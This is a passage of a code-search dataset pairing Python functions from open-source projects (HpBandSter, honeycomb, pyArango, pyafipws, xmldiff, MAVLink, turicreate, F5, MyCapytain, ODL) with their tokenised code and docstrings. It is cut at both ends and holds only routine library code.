https://github.com/automl/HpBandSter/blob/841db4b827f342e5eb7f725723ea6461ac52d45a/hpbandster/examples/plot_example_7_interactive_plot.py#L39-L51
def realtime_learning_curves(runs): """ example how to extract a different kind of learning curve. The x values are now the time the runs finished, not the budget anymore. We no longer plot the validation loss on the y axis, but now the test accuracy. This is just to show how to get different information into the interactive plot. """ sr = sorted(runs, key=lambda r: r.budget) lc = list(filter(lambda t: not t[1] is None, [(r.time_stamps['finished'], r.info['test accuracy']) for r in sr])) return([lc,])
[ "def", "realtime_learning_curves", "(", "runs", ")", ":", "sr", "=", "sorted", "(", "runs", ",", "key", "=", "lambda", "r", ":", "r", ".", "budget", ")", "lc", "=", "list", "(", "filter", "(", "lambda", "t", ":", "not", "t", "[", "1", "]", "is", "None", ",", "[", "(", "r", ".", "time_stamps", "[", "'finished'", "]", ",", "r", ".", "info", "[", "'test accuracy'", "]", ")", "for", "r", "in", "sr", "]", ")", ")", "return", "(", "[", "lc", ",", "]", ")" ]
example how to extract a different kind of learning curve. The x values are now the time the runs finished, not the budget anymore. We no longer plot the validation loss on the y axis, but now the test accuracy. This is just to show how to get different information into the interactive plot.
[ "example", "how", "to", "extract", "a", "different", "kind", "of", "learning", "curve", ".", "The", "x", "values", "are", "now", "the", "time", "the", "runs", "finished", "not", "the", "budget", "anymore", ".", "We", "no", "longer", "plot", "the", "validation", "loss", "on", "the", "y", "axis", "but", "now", "the", "test", "accuracy", ".", "This", "is", "just", "to", "show", "how", "to", "get", "different", "information", "into", "the", "interactive", "plot", "." ]
python
train
Cymmetria/honeycomb
honeycomb/utils/config_utils.py
https://github.com/Cymmetria/honeycomb/blob/33ea91b5cf675000e4e85dd02efe580ea6e95c86/honeycomb/utils/config_utils.py#L30-L38
def validate_config(config_json, fields): """Validate a JSON file configuration against list of :obj:`honeycomb.defs.ConfigField`.""" for field_name, validator_obj in six.iteritems(fields): field_value = config_json.get(field_name, None) if field_value is None: raise exceptions.ConfigFieldMissing(field_name) if not validator_obj.validator_func(field_value): raise exceptions.ConfigFieldValidationError(field_name, field_value, validator_obj.get_error_message())
[ "def", "validate_config", "(", "config_json", ",", "fields", ")", ":", "for", "field_name", ",", "validator_obj", "in", "six", ".", "iteritems", "(", "fields", ")", ":", "field_value", "=", "config_json", ".", "get", "(", "field_name", ",", "None", ")", "if", "field_value", "is", "None", ":", "raise", "exceptions", ".", "ConfigFieldMissing", "(", "field_name", ")", "if", "not", "validator_obj", ".", "validator_func", "(", "field_value", ")", ":", "raise", "exceptions", ".", "ConfigFieldValidationError", "(", "field_name", ",", "field_value", ",", "validator_obj", ".", "get_error_message", "(", ")", ")" ]
Validate a JSON file configuration against list of :obj:`honeycomb.defs.ConfigField`.
[ "Validate", "a", "JSON", "file", "configuration", "against", "list", "of", ":", "obj", ":", "honeycomb", ".", "defs", ".", "ConfigField", "." ]
python
train
ArangoDB-Community/pyArango
pyArango/graph.py
https://github.com/ArangoDB-Community/pyArango/blob/dd72e5f6c540e5e148943d615ddf7553bb78ce0b/pyArango/graph.py#L142-L170
def createEdge(self, collectionName, _fromId, _toId, edgeAttributes, waitForSync = False) : """creates an edge between two documents""" if not _fromId : raise ValueError("Invalid _fromId: %s" % _fromId) if not _toId : raise ValueError("Invalid _toId: %s" % _toId) if collectionName not in self.definitions : raise KeyError("'%s' is not among the edge definitions" % collectionName) url = "%s/edge/%s" % (self.URL, collectionName) self.database[collectionName].validatePrivate("_from", _fromId) self.database[collectionName].validatePrivate("_to", _toId) ed = self.database[collectionName].createEdge() ed.set(edgeAttributes) ed.validate() payload = ed.getStore() payload.update({'_from' : _fromId, '_to' : _toId}) r = self.connection.session.post(url, data = json.dumps(payload, default=str), params = {'waitForSync' : waitForSync}) data = r.json() if r.status_code == 201 or r.status_code == 202 : return self.database[collectionName][data["edge"]["_key"]] # print "\ngraph 160, ", data, payload, _fromId raise CreationError("Unable to create edge, %s" % r.json()["errorMessage"], data)
[ "def", "createEdge", "(", "self", ",", "collectionName", ",", "_fromId", ",", "_toId", ",", "edgeAttributes", ",", "waitForSync", "=", "False", ")", ":", "if", "not", "_fromId", ":", "raise", "ValueError", "(", "\"Invalid _fromId: %s\"", "%", "_fromId", ")", "if", "not", "_toId", ":", "raise", "ValueError", "(", "\"Invalid _toId: %s\"", "%", "_toId", ")", "if", "collectionName", "not", "in", "self", ".", "definitions", ":", "raise", "KeyError", "(", "\"'%s' is not among the edge definitions\"", "%", "collectionName", ")", "url", "=", "\"%s/edge/%s\"", "%", "(", "self", ".", "URL", ",", "collectionName", ")", "self", ".", "database", "[", "collectionName", "]", ".", "validatePrivate", "(", "\"_from\"", ",", "_fromId", ")", "self", ".", "database", "[", "collectionName", "]", ".", "validatePrivate", "(", "\"_to\"", ",", "_toId", ")", "ed", "=", "self", ".", "database", "[", "collectionName", "]", ".", "createEdge", "(", ")", "ed", ".", "set", "(", "edgeAttributes", ")", "ed", ".", "validate", "(", ")", "payload", "=", "ed", ".", "getStore", "(", ")", "payload", ".", "update", "(", "{", "'_from'", ":", "_fromId", ",", "'_to'", ":", "_toId", "}", ")", "r", "=", "self", ".", "connection", ".", "session", ".", "post", "(", "url", ",", "data", "=", "json", ".", "dumps", "(", "payload", ",", "default", "=", "str", ")", ",", "params", "=", "{", "'waitForSync'", ":", "waitForSync", "}", ")", "data", "=", "r", ".", "json", "(", ")", "if", "r", ".", "status_code", "==", "201", "or", "r", ".", "status_code", "==", "202", ":", "return", "self", ".", "database", "[", "collectionName", "]", "[", "data", "[", "\"edge\"", "]", "[", "\"_key\"", "]", "]", "# print \"\\ngraph 160, \", data, payload, _fromId", "raise", "CreationError", "(", "\"Unable to create edge, %s\"", "%", "r", ".", "json", "(", ")", "[", "\"errorMessage\"", "]", ",", "data", ")" ]
creates an edge between two documents
[ "creates", "an", "edge", "between", "two", "documents" ]
python
train
reingart/pyafipws
utils.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/utils.py#L228-L304
def Conectar(self, cache=None, wsdl=None, proxy="", wrapper=None, cacert=None, timeout=30, soap_server=None): "Conectar cliente soap del web service" try: # analizar transporte y servidor proxy: if wrapper: Http = set_http_wrapper(wrapper) self.Version = self.Version + " " + Http._wrapper_version if isinstance(proxy, dict): proxy_dict = proxy else: proxy_dict = parse_proxy(proxy) self.log("Proxy Dict: %s" % str(proxy_dict)) if self.HOMO or not wsdl: wsdl = self.WSDL # agregar sufijo para descargar descripción del servicio ?WSDL o ?wsdl if not wsdl.endswith(self.WSDL[-5:]) and wsdl.startswith("http"): wsdl += self.WSDL[-5:] if not cache or self.HOMO: # use 'cache' from installation base directory cache = os.path.join(self.InstallDir, 'cache') # deshabilitar verificación cert. servidor si es nulo falso vacio if not cacert: cacert = None elif cacert is True: # usar certificados predeterminados que vienen en la biblioteca cacert = os.path.join(httplib2.__path__[0], 'cacerts.txt') elif cacert.startswith("-----BEGIN CERTIFICATE-----"): pass else: if not os.path.exists(cacert): self.log("Buscando CACERT en conf...") cacert = os.path.join(self.InstallDir, "conf", os.path.basename(cacert)) if cacert and not os.path.exists(cacert): self.log("No se encuentra CACERT: %s" % str(cacert)) warnings.warn("No se encuentra CACERT: %s" % str(cacert)) cacert = None # wrong version, certificates not found... raise RuntimeError("Error de configuracion CACERT ver DebugLog") return False self.log("Conectando a wsdl=%s cache=%s proxy=%s" % (wsdl, cache, proxy_dict)) # analizar espacio de nombres (axis vs .net): ns = 'ser' if self.WSDL[-5:] == "?wsdl" else None self.client = SoapClient( wsdl = wsdl, cache = cache, proxy = proxy_dict, cacert = cacert, timeout = timeout, ns = ns, soap_server = soap_server, trace = "--trace" in sys.argv) self.cache = cache # utilizado por WSLPG y WSAA (Ticket de Acceso) self.wsdl = wsdl # utilizado por TrazaMed (para corregir el location) # corrijo ubicación del servidor (puerto http 80 en el WSDL AFIP) for service in self.client.services.values(): for port in service['ports'].values(): location = port['location'] if location and location.startswith("http://"): warnings.warn("Corrigiendo WSDL ... %s" % location) location = location.replace("http://", "https://").replace(":80", ":443") # usar servidor real si en el WSDL figura "localhost" localhost = 'https://localhost:' if location.startswith(localhost): url = urlparse(wsdl) location = location.replace("localhost", url.hostname) location = location.replace(":9051", ":443") port['location'] = location return True except: ex = traceback.format_exception( sys.exc_type, sys.exc_value, sys.exc_traceback) self.Traceback = ''.join(ex) try: self.Excepcion = traceback.format_exception_only( sys.exc_type, sys.exc_value)[0] except: self.Excepcion = u"<no disponible>" if self.LanzarExcepciones: raise return False
[ "def", "Conectar", "(", "self", ",", "cache", "=", "None", ",", "wsdl", "=", "None", ",", "proxy", "=", "\"\"", ",", "wrapper", "=", "None", ",", "cacert", "=", "None", ",", "timeout", "=", "30", ",", "soap_server", "=", "None", ")", ":", "try", ":", "# analizar transporte y servidor proxy:", "if", "wrapper", ":", "Http", "=", "set_http_wrapper", "(", "wrapper", ")", "self", ".", "Version", "=", "self", ".", "Version", "+", "\" \"", "+", "Http", ".", "_wrapper_version", "if", "isinstance", "(", "proxy", ",", "dict", ")", ":", "proxy_dict", "=", "proxy", "else", ":", "proxy_dict", "=", "parse_proxy", "(", "proxy", ")", "self", ".", "log", "(", "\"Proxy Dict: %s\"", "%", "str", "(", "proxy_dict", ")", ")", "if", "self", ".", "HOMO", "or", "not", "wsdl", ":", "wsdl", "=", "self", ".", "WSDL", "# agregar sufijo para descargar descripción del servicio ?WSDL o ?wsdl", "if", "not", "wsdl", ".", "endswith", "(", "self", ".", "WSDL", "[", "-", "5", ":", "]", ")", "and", "wsdl", ".", "startswith", "(", "\"http\"", ")", ":", "wsdl", "+=", "self", ".", "WSDL", "[", "-", "5", ":", "]", "if", "not", "cache", "or", "self", ".", "HOMO", ":", "# use 'cache' from installation base directory ", "cache", "=", "os", ".", "path", ".", "join", "(", "self", ".", "InstallDir", ",", "'cache'", ")", "# deshabilitar verificación cert. servidor si es nulo falso vacio", "if", "not", "cacert", ":", "cacert", "=", "None", "elif", "cacert", "is", "True", ":", "# usar certificados predeterminados que vienen en la biblioteca", "cacert", "=", "os", ".", "path", ".", "join", "(", "httplib2", ".", "__path__", "[", "0", "]", ",", "'cacerts.txt'", ")", "elif", "cacert", ".", "startswith", "(", "\"-----BEGIN CERTIFICATE-----\"", ")", ":", "pass", "else", ":", "if", "not", "os", ".", "path", ".", "exists", "(", "cacert", ")", ":", "self", ".", "log", "(", "\"Buscando CACERT en conf...\"", ")", "cacert", "=", "os", ".", "path", ".", "join", "(", "self", ".", "InstallDir", ",", "\"conf\"", ",", "os", ".", "path", ".", "basename", "(", "cacert", ")", ")", "if", "cacert", "and", "not", "os", ".", "path", ".", "exists", "(", "cacert", ")", ":", "self", ".", "log", "(", "\"No se encuentra CACERT: %s\"", "%", "str", "(", "cacert", ")", ")", "warnings", ".", "warn", "(", "\"No se encuentra CACERT: %s\"", "%", "str", "(", "cacert", ")", ")", "cacert", "=", "None", "# wrong version, certificates not found...", "raise", "RuntimeError", "(", "\"Error de configuracion CACERT ver DebugLog\"", ")", "return", "False", "self", ".", "log", "(", "\"Conectando a wsdl=%s cache=%s proxy=%s\"", "%", "(", "wsdl", ",", "cache", ",", "proxy_dict", ")", ")", "# analizar espacio de nombres (axis vs .net):", "ns", "=", "'ser'", "if", "self", ".", "WSDL", "[", "-", "5", ":", "]", "==", "\"?wsdl\"", "else", "None", "self", ".", "client", "=", "SoapClient", "(", "wsdl", "=", "wsdl", ",", "cache", "=", "cache", ",", "proxy", "=", "proxy_dict", ",", "cacert", "=", "cacert", ",", "timeout", "=", "timeout", ",", "ns", "=", "ns", ",", "soap_server", "=", "soap_server", ",", "trace", "=", "\"--trace\"", "in", "sys", ".", "argv", ")", "self", ".", "cache", "=", "cache", "# utilizado por WSLPG y WSAA (Ticket de Acceso)", "self", ".", "wsdl", "=", "wsdl", "# utilizado por TrazaMed (para corregir el location)", "# corrijo ubicación del servidor (puerto http 80 en el WSDL AFIP)", "for", "service", "in", "self", ".", "client", ".", "services", ".", "values", "(", ")", ":", "for", "port", "in", "service", "[", "'ports'", "]", ".", "values", "(", ")", ":", "location", "=", "port", "[", "'location'", "]", "if", "location", "and", "location", ".", "startswith", "(", "\"http://\"", ")", ":", "warnings", ".", "warn", "(", "\"Corrigiendo WSDL ... %s\"", "%", "location", ")", "location", "=", "location", ".", "replace", "(", "\"http://\"", ",", "\"https://\"", ")", ".", "replace", "(", "\":80\"", ",", "\":443\"", ")", "# usar servidor real si en el WSDL figura \"localhost\"", "localhost", "=", "'https://localhost:'", "if", "location", ".", "startswith", "(", "localhost", ")", ":", "url", "=", "urlparse", "(", "wsdl", ")", "location", "=", "location", ".", "replace", "(", "\"localhost\"", ",", "url", ".", "hostname", ")", "location", "=", "location", ".", "replace", "(", "\":9051\"", ",", "\":443\"", ")", "port", "[", "'location'", "]", "=", "location", "return", "True", "except", ":", "ex", "=", "traceback", ".", "format_exception", "(", "sys", ".", "exc_type", ",", "sys", ".", "exc_value", ",", "sys", ".", "exc_traceback", ")", "self", ".", "Traceback", "=", "''", ".", "join", "(", "ex", ")", "try", ":", "self", ".", "Excepcion", "=", "traceback", ".", "format_exception_only", "(", "sys", ".", "exc_type", ",", "sys", ".", "exc_value", ")", "[", "0", "]", "except", ":", "self", ".", "Excepcion", "=", "u\"<no disponible>\"", "if", "self", ".", "LanzarExcepciones", ":", "raise", "return", "False" ]
Conectar cliente soap del web service
[ "Conectar", "cliente", "soap", "del", "web", "service" ]
python
train
Shoobx/xmldiff
xmldiff/main.py
https://github.com/Shoobx/xmldiff/blob/ec7835bce9ba69ff4ce03ab6c11397183b6f8411/xmldiff/main.py#L129-L143
def patch_file(actions, tree): """Takes two filenames or streams, one with XML the other a diff""" tree = etree.parse(tree) if isinstance(actions, six.string_types): # It's a string, so it's a filename with open(actions) as f: actions = f.read() else: # We assume it's a stream actions = actions.read() actions = patch.DiffParser().parse(actions) tree = patch_tree(actions, tree) return etree.tounicode(tree)
[ "def", "patch_file", "(", "actions", ",", "tree", ")", ":", "tree", "=", "etree", ".", "parse", "(", "tree", ")", "if", "isinstance", "(", "actions", ",", "six", ".", "string_types", ")", ":", "# It's a string, so it's a filename", "with", "open", "(", "actions", ")", "as", "f", ":", "actions", "=", "f", ".", "read", "(", ")", "else", ":", "# We assume it's a stream", "actions", "=", "actions", ".", "read", "(", ")", "actions", "=", "patch", ".", "DiffParser", "(", ")", ".", "parse", "(", "actions", ")", "tree", "=", "patch_tree", "(", "actions", ",", "tree", ")", "return", "etree", ".", "tounicode", "(", "tree", ")" ]
Takes two filenames or streams, one with XML the other a diff
[ "Takes", "two", "filenames", "or", "streams", "one", "with", "XML", "the", "other", "a", "diff" ]
python
train
etcher-be/elib_miz
elib_miz/mission.py
https://github.com/etcher-be/elib_miz/blob/f28db58fadb2cd9341e0ae4d65101c0cc7d8f3d7/elib_miz/mission.py#L597-L614
def get_country_by_id(self, country_id) -> 'Country': """ Gets a country in this coalition by its ID Args: country_id: country Id Returns: Country """ VALID_POSITIVE_INT.validate(country_id, 'get_country_by_id', exc=ValueError) if country_id not in self._countries_by_id.keys(): for country in self.countries: if country.country_id == country_id: return country raise ValueError(country_id) else: return self._countries_by_id[country_id]
[ "def", "get_country_by_id", "(", "self", ",", "country_id", ")", "->", "'Country'", ":", "VALID_POSITIVE_INT", ".", "validate", "(", "country_id", ",", "'get_country_by_id'", ",", "exc", "=", "ValueError", ")", "if", "country_id", "not", "in", "self", ".", "_countries_by_id", ".", "keys", "(", ")", ":", "for", "country", "in", "self", ".", "countries", ":", "if", "country", ".", "country_id", "==", "country_id", ":", "return", "country", "raise", "ValueError", "(", "country_id", ")", "else", ":", "return", "self", ".", "_countries_by_id", "[", "country_id", "]" ]
Gets a country in this coalition by its ID Args: country_id: country Id Returns: Country
[ "Gets", "a", "country", "in", "this", "coalition", "by", "its", "ID" ]
python
train
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py#L8392-L8409
def serial_udb_extra_f14_send(self, sue_WIND_ESTIMATION, sue_GPS_TYPE, sue_DR, sue_BOARD_TYPE, sue_AIRFRAME, sue_RCON, sue_TRAP_FLAGS, sue_TRAP_SOURCE, sue_osc_fail_count, sue_CLOCK_CONFIG, sue_FLIGHT_PLAN_TYPE, force_mavlink1=False): ''' Backwards compatible version of SERIAL_UDB_EXTRA F14: format sue_WIND_ESTIMATION : Serial UDB Extra Wind Estimation Enabled (uint8_t) sue_GPS_TYPE : Serial UDB Extra Type of GPS Unit (uint8_t) sue_DR : Serial UDB Extra Dead Reckoning Enabled (uint8_t) sue_BOARD_TYPE : Serial UDB Extra Type of UDB Hardware (uint8_t) sue_AIRFRAME : Serial UDB Extra Type of Airframe (uint8_t) sue_RCON : Serial UDB Extra Reboot Regitster of DSPIC (int16_t) sue_TRAP_FLAGS : Serial UDB Extra Last dspic Trap Flags (int16_t) sue_TRAP_SOURCE : Serial UDB Extra Type Program Address of Last Trap (uint32_t) sue_osc_fail_count : Serial UDB Extra Number of Ocillator Failures (int16_t) sue_CLOCK_CONFIG : Serial UDB Extra UDB Internal Clock Configuration (uint8_t) sue_FLIGHT_PLAN_TYPE : Serial UDB Extra Type of Flight Plan (uint8_t) ''' return self.send(self.serial_udb_extra_f14_encode(sue_WIND_ESTIMATION, sue_GPS_TYPE, sue_DR, sue_BOARD_TYPE, sue_AIRFRAME, sue_RCON, sue_TRAP_FLAGS, sue_TRAP_SOURCE, sue_osc_fail_count, sue_CLOCK_CONFIG, sue_FLIGHT_PLAN_TYPE), force_mavlink1=force_mavlink1)
[ "def", "serial_udb_extra_f14_send", "(", "self", ",", "sue_WIND_ESTIMATION", ",", "sue_GPS_TYPE", ",", "sue_DR", ",", "sue_BOARD_TYPE", ",", "sue_AIRFRAME", ",", "sue_RCON", ",", "sue_TRAP_FLAGS", ",", "sue_TRAP_SOURCE", ",", "sue_osc_fail_count", ",", "sue_CLOCK_CONFIG", ",", "sue_FLIGHT_PLAN_TYPE", ",", "force_mavlink1", "=", "False", ")", ":", "return", "self", ".", "send", "(", "self", ".", "serial_udb_extra_f14_encode", "(", "sue_WIND_ESTIMATION", ",", "sue_GPS_TYPE", ",", "sue_DR", ",", "sue_BOARD_TYPE", ",", "sue_AIRFRAME", ",", "sue_RCON", ",", "sue_TRAP_FLAGS", ",", "sue_TRAP_SOURCE", ",", "sue_osc_fail_count", ",", "sue_CLOCK_CONFIG", ",", "sue_FLIGHT_PLAN_TYPE", ")", ",", "force_mavlink1", "=", "force_mavlink1", ")" ]
Backwards compatible version of SERIAL_UDB_EXTRA F14: format sue_WIND_ESTIMATION : Serial UDB Extra Wind Estimation Enabled (uint8_t) sue_GPS_TYPE : Serial UDB Extra Type of GPS Unit (uint8_t) sue_DR : Serial UDB Extra Dead Reckoning Enabled (uint8_t) sue_BOARD_TYPE : Serial UDB Extra Type of UDB Hardware (uint8_t) sue_AIRFRAME : Serial UDB Extra Type of Airframe (uint8_t) sue_RCON : Serial UDB Extra Reboot Regitster of DSPIC (int16_t) sue_TRAP_FLAGS : Serial UDB Extra Last dspic Trap Flags (int16_t) sue_TRAP_SOURCE : Serial UDB Extra Type Program Address of Last Trap (uint32_t) sue_osc_fail_count : Serial UDB Extra Number of Ocillator Failures (int16_t) sue_CLOCK_CONFIG : Serial UDB Extra UDB Internal Clock Configuration (uint8_t) sue_FLIGHT_PLAN_TYPE : Serial UDB Extra Type of Flight Plan (uint8_t)
[ "Backwards", "compatible", "version", "of", "SERIAL_UDB_EXTRA", "F14", ":", "format" ]
python
train
apple/turicreate
src/unity/python/turicreate/meta/decompiler/disassemble.py
https://github.com/apple/turicreate/blob/74514c3f99e25b46f22c6e02977fe3da69221c2e/src/unity/python/turicreate/meta/decompiler/disassemble.py#L29-L92
def print_code(co, lasti= -1, level=0): """Disassemble a code object.""" code = co.co_code for constant in co.co_consts: print( '| |' * level, end=' ') print( 'constant:', constant) labels = findlabels(code) linestarts = dict(findlinestarts(co)) n = len(code) i = 0 extended_arg = 0 free = None while i < n: have_inner = False c = code[i] op = co_ord(c) if i in linestarts: if i > 0: print() print( '| |' * level, end=' ') print( "%3d" % linestarts[i], end=' ') else: print( '| |' * level, end=' ') print(' ', end=' ') if i == lasti: print( '-->',end=' ') else: print( ' ', end=' ') if i in labels: print( '>>', end=' ') else: print( ' ',end=' ') print(repr(i).rjust(4), end=' ') print(opcode.opname[op].ljust(20), end=' ') i = i + 1 if op >= opcode.HAVE_ARGUMENT: oparg = co_ord(code[i]) + co_ord(code[i + 1]) * 256 + extended_arg extended_arg = 0 i = i + 2 if op == opcode.EXTENDED_ARG: extended_arg = oparg * 65536 print( repr(oparg).rjust(5), end=' ') if op in opcode.hasconst: print( '(' + repr(co.co_consts[oparg]) + ')', end=' ') if type(co.co_consts[oparg]) == types.CodeType: have_inner = co.co_consts[oparg] elif op in opcode.hasname: print( '(' + co.co_names[oparg] + ')',end=' ') elif op in opcode.hasjrel: print('(to ' + repr(i + oparg) + ')', end=' ') elif op in opcode.haslocal: print('(' + co.co_varnames[oparg] + ')', end=' ') elif op in opcode.hascompare: print('(' + opcode.cmp_op[oparg] + ')', end=' ') elif op in opcode.hasfree: if free is None: free = co.co_cellvars + co.co_freevars print('(' + free[oparg] + ')', end=' ') print() if have_inner is not False: print_code(have_inner, level=level + 1)
[ "def", "print_code", "(", "co", ",", "lasti", "=", "-", "1", ",", "level", "=", "0", ")", ":", "code", "=", "co", ".", "co_code", "for", "constant", "in", "co", ".", "co_consts", ":", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "'constant:'", ",", "constant", ")", "labels", "=", "findlabels", "(", "code", ")", "linestarts", "=", "dict", "(", "findlinestarts", "(", "co", ")", ")", "n", "=", "len", "(", "code", ")", "i", "=", "0", "extended_arg", "=", "0", "free", "=", "None", "while", "i", "<", "n", ":", "have_inner", "=", "False", "c", "=", "code", "[", "i", "]", "op", "=", "co_ord", "(", "c", ")", "if", "i", "in", "linestarts", ":", "if", "i", ">", "0", ":", "print", "(", ")", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "\"%3d\"", "%", "linestarts", "[", "i", "]", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "' '", ",", "end", "=", "' '", ")", "if", "i", "==", "lasti", ":", "print", "(", "'-->'", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "' '", ",", "end", "=", "' '", ")", "if", "i", "in", "labels", ":", "print", "(", "'>>'", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "' '", ",", "end", "=", "' '", ")", "print", "(", "repr", "(", "i", ")", ".", "rjust", "(", "4", ")", ",", "end", "=", "' '", ")", "print", "(", "opcode", ".", "opname", "[", "op", "]", ".", "ljust", "(", "20", ")", ",", "end", "=", "' '", ")", "i", "=", "i", "+", "1", "if", "op", ">=", "opcode", ".", "HAVE_ARGUMENT", ":", "oparg", "=", "co_ord", "(", "code", "[", "i", "]", ")", "+", "co_ord", "(", "code", "[", "i", "+", "1", "]", ")", "*", "256", "+", "extended_arg", "extended_arg", "=", "0", "i", "=", "i", "+", "2", "if", "op", "==", "opcode", ".", "EXTENDED_ARG", ":", "extended_arg", "=", "oparg", "*", "65536", "print", "(", "repr", "(", "oparg", ")", ".", "rjust", "(", "5", ")", ",", "end", "=", "' '", ")", "if", "op", "in", "opcode", ".", "hasconst", ":", "print", "(", "'('", "+", "repr", "(", "co", ".", "co_consts", "[", "oparg", "]", ")", "+", "')'", ",", "end", "=", "' '", ")", "if", "type", "(", "co", ".", "co_consts", "[", "oparg", "]", ")", "==", "types", ".", "CodeType", ":", "have_inner", "=", "co", ".", "co_consts", "[", "oparg", "]", "elif", "op", "in", "opcode", ".", "hasname", ":", "print", "(", "'('", "+", "co", ".", "co_names", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hasjrel", ":", "print", "(", "'(to '", "+", "repr", "(", "i", "+", "oparg", ")", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "haslocal", ":", "print", "(", "'('", "+", "co", ".", "co_varnames", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hascompare", ":", "print", "(", "'('", "+", "opcode", ".", "cmp_op", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hasfree", ":", "if", "free", "is", "None", ":", "free", "=", "co", ".", "co_cellvars", "+", "co", ".", "co_freevars", "print", "(", "'('", "+", "free", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "print", "(", ")", "if", "have_inner", "is", "not", "False", ":", "print_code", "(", "have_inner", ",", "level", "=", "level", "+", "1", ")" ]
Disassemble a code object.
[ "Disassemble", "a", "code", "object", "." ]
python
train
F5Networks/f5-common-python
f5/bigip/mixins.py
https://github.com/F5Networks/f5-common-python/blob/7e67d5acd757a60e3d5f8c88c534bd72208f5494/f5/bigip/mixins.py#L243-L263
def _exec_cmd(self, command, **kwargs): """Create a new method as command has specific requirements. There is a handful of the TMSH global commands supported, so this method requires them as a parameter. :raises: InvalidCommand """ kwargs['command'] = command self._check_exclusive_parameters(**kwargs) requests_params = self._handle_requests_params(kwargs) session = self._meta_data['bigip']._meta_data['icr_session'] response = session.post( self._meta_data['uri'], json=kwargs, **requests_params) new_instance = self._stamp_out_core() new_instance._local_update(response.json()) if 'commandResult' in new_instance.__dict__: new_instance._check_command_result() return new_instance
[ "def", "_exec_cmd", "(", "self", ",", "command", ",", "*", "*", "kwargs", ")", ":", "kwargs", "[", "'command'", "]", "=", "command", "self", ".", "_check_exclusive_parameters", "(", "*", "*", "kwargs", ")", "requests_params", "=", "self", ".", "_handle_requests_params", "(", "kwargs", ")", "session", "=", "self", ".", "_meta_data", "[", "'bigip'", "]", ".", "_meta_data", "[", "'icr_session'", "]", "response", "=", "session", ".", "post", "(", "self", ".", "_meta_data", "[", "'uri'", "]", ",", "json", "=", "kwargs", ",", "*", "*", "requests_params", ")", "new_instance", "=", "self", ".", "_stamp_out_core", "(", ")", "new_instance", ".", "_local_update", "(", "response", ".", "json", "(", ")", ")", "if", "'commandResult'", "in", "new_instance", ".", "__dict__", ":", "new_instance", ".", "_check_command_result", "(", ")", "return", "new_instance" ]
Create a new method as command has specific requirements. There is a handful of the TMSH global commands supported, so this method requires them as a parameter. :raises: InvalidCommand
[ "Create", "a", "new", "method", "as", "command", "has", "specific", "requirements", "." ]
python
train
Capitains/MyCapytain
MyCapytain/common/metadata.py
https://github.com/Capitains/MyCapytain/blob/b11bbf6b6ae141fc02be70471e3fbf6907be6593/MyCapytain/common/metadata.py#L72-L87
def add(self, key, value, lang=None): """ Add a triple to the graph related to this node :param key: Predicate of the triple :param value: Object of the triple :param lang: Language of the triple if applicable """ if not isinstance(value, Literal) and lang is not None: value = Literal(value, lang=lang) elif not isinstance(value, (BNode, URIRef)): value, _type = term._castPythonToLiteral(value) if _type is None: value = Literal(value) else: value = Literal(value, datatype=_type) self.graph.add((self.asNode(), key, value))
[ "def", "add", "(", "self", ",", "key", ",", "value", ",", "lang", "=", "None", ")", ":", "if", "not", "isinstance", "(", "value", ",", "Literal", ")", "and", "lang", "is", "not", "None", ":", "value", "=", "Literal", "(", "value", ",", "lang", "=", "lang", ")", "elif", "not", "isinstance", "(", "value", ",", "(", "BNode", ",", "URIRef", ")", ")", ":", "value", ",", "_type", "=", "term", ".", "_castPythonToLiteral", "(", "value", ")", "if", "_type", "is", "None", ":", "value", "=", "Literal", "(", "value", ")", "else", ":", "value", "=", "Literal", "(", "value", ",", "datatype", "=", "_type", ")", "self", ".", "graph", ".", "add", "(", "(", "self", ".", "asNode", "(", ")", ",", "key", ",", "value", ")", ")" ]
Add a triple to the graph related to this node :param key: Predicate of the triple :param value: Object of the triple :param lang: Language of the triple if applicable
[ "Add", "a", "triple", "to", "the", "graph", "related", "to", "this", "node" ]
python
train
odlgroup/odl
odl/phantom/geometric.py
https://github.com/odlgroup/odl/blob/b8443f6aca90e191ba36c91d32253c5a36249a6c/odl/phantom/geometric.py#L706-L764
def smooth_cuboid(space, min_pt=None, max_pt=None, axis=0): """Cuboid with smooth variations. Parameters ---------- space : `DiscreteLp` Discretized space in which the phantom is supposed to be created. min_pt : array-like of shape ``(space.ndim,)``, optional Lower left corner of the cuboid. If ``None`` is given, a quarter of the extent from ``space.min_pt`` towards the inside is chosen. max_pt : array-like of shape ``(space.ndim,)``, optional Upper right corner of the cuboid. If ``None`` is given, ``min_pt`` plus half the extent is chosen. axis : int or sequence of int Dimension(s) along which the smooth variation should happen. Returns ------- phantom : ``space``-element The generated cuboid phantom in ``space``. Values have range [0, 1]. """ dom_min_pt = space.domain.min() dom_max_pt = space.domain.max() if min_pt is None: min_pt = dom_min_pt * 0.75 + dom_max_pt * 0.25 if max_pt is None: max_pt = dom_min_pt * 0.25 + dom_max_pt * 0.75 min_pt = np.atleast_1d(min_pt) max_pt = np.atleast_1d(max_pt) axis = np.array(axis, dtype=int, ndmin=1) if min_pt.shape != (space.ndim,): raise ValueError('shape of `min_pt` must be {}, got {}' ''.format((space.ndim,), min_pt.shape)) if max_pt.shape != (space.ndim,): raise ValueError('shape of `max_pt` must be {}, got {}' ''.format((space.ndim,), max_pt.shape)) sign = 0 for i, coord in enumerate(space.meshgrid): sign = sign | (coord < min_pt[i]) | (coord > max_pt[i]) values = 0 for i in axis: coord = space.meshgrid[i] extent = (dom_max_pt[i] - 